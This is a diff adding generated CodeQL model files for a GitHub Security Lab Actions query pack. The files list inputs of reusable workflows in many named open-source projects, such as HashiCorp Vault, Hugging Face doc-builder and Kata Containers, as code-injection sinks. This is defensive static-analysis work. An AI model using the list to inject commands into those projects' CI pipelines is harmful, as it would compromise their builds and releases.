-0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml new file mode 100644 index 00000000000..c5f5fc4b29d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml new file mode 100644 index 00000000000..506dd2b9fee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml new file mode 100644 index 00000000000..4a81c585259 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml new file mode 100644 index 00000000000..d62c86e1129 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml new file mode 100644 index 00000000000..8aedf9000a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml new file mode 100644 index 00000000000..b14f14538b8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml new file mode 100644 index 00000000000..3129cac8979 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml new file mode 100644 index 00000000000..a23f69909c7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml new file mode 100644 index 00000000000..cd91f58c7ec --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml new file mode 100644 index 00000000000..f9b7785cab9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml new file mode 100644 index 00000000000..ad0943c3040 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml new file mode 100644 index 00000000000..e263590260f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml new file mode 100644 index 00000000000..00b45b50f88 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml new file mode 100644 index 00000000000..a5f35f3b737 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml new file mode 100644 index 00000000000..d0559519627 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml new file mode 100644 index 00000000000..ec7b51abd8e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml new file mode 100644 index 00000000000..92fd43bda75 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml new file mode 100644 index 00000000000..ca550e4ddd7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml new file mode 100644 index 00000000000..580ac8bef0b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml new file mode 100644 index 00000000000..463536e9693 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml new file mode 100644 index 00000000000..57bf30dc0cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml new file mode 100644 index 00000000000..b7e49d46e1c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml new file mode 100644 index 00000000000..89257a02fcd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml new file mode 100644 index 00000000000..a645511766b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml new file mode 100644 index 00000000000..1a7784c9f01 
--- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml new file mode 100644 index 00000000000..ffb7a7d7d10 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml new file mode 100644 index 00000000000..4ae93a83cd8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml 
@@ -0,0 +1,23 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - 
["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml new file mode 100644 index 00000000000..a63ddd5da67 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml new file mode 100644 index 00000000000..e73d0d81875 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml 
@@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", 
"generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml new file mode 100644 index 00000000000..3a911989874 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml new file mode 100644 index 00000000000..3c525970ecc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml new file mode 100644 index 00000000000..187b3d2fd0a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml new file mode 100644 index 00000000000..3e11359c6b3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] 